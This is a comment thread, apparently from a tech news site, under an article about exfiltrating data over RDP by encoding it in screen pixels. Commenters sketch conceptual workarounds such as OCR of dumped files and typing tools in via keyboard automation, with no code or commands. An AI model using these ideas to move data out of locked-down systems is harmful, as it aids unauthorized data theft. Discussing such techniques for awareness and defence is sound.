Bizarre security
so .. you'#re saying RDP has a feature to block file transfer outwards yet still allows remote execution ?
Why not just ftp it ?
It's the kind of thinking you expect from someone who lives in a volcano lair: exfiltrating data from remote screen pixel values. The idea comes from Pen Test Partners' Alan Monie, taking a break from sex toy hacks and wondering how to get data over a connection like RDP (remote desktop protocol) when the target had blocked …
The fine article says the victim doesn't see the data screens, they're only displayed on the attacker's end. I don't understand why not, though. Don't know enough about the plumbing of GUIs (like, anything at all, really) but how can the standard Windows RDP server be tricked into inserting pixels into the bytestream going to the attacker, if they're not in the frame being displayed to the user on the console?
Almost 25 years ago the Timex Datalink watch could be programmed by placing it against a monitor and flashing pixels at it. This seems to just be a higher bandwidth version of that.
The problem appears to be in getting the screen flashing code on to the target. One could avoid having to do that by using a 'type', 'cat' or some hex dump command and running virtual OCR software at the receiving end. Slower but easier to pull off.
There are various ways of getting something onto a target system. One of the most obvious is to just downloading the file from the Internet - there is often some external connectivity available which can be used. Another option is to use keyboard automation on the client system which just types the program in for the user, relatively simple, if slow, scripting would work.
All this depends on how locked down the server is - I have come across some that were very proficiently locked down... and others not so of course.
It still requires injecting the RAT somewhere in the pipe, but would allow folks to pull data that should not otherwise move. The weird screen view would be on the receiving end, who <should> be expecting it. If you see it on your RDP sessions and you aren't expecting it -- you're already too late as your (desktop/laptop/tool of choice) has been shanghaied for quite some time, and the results have likely already flown the coop.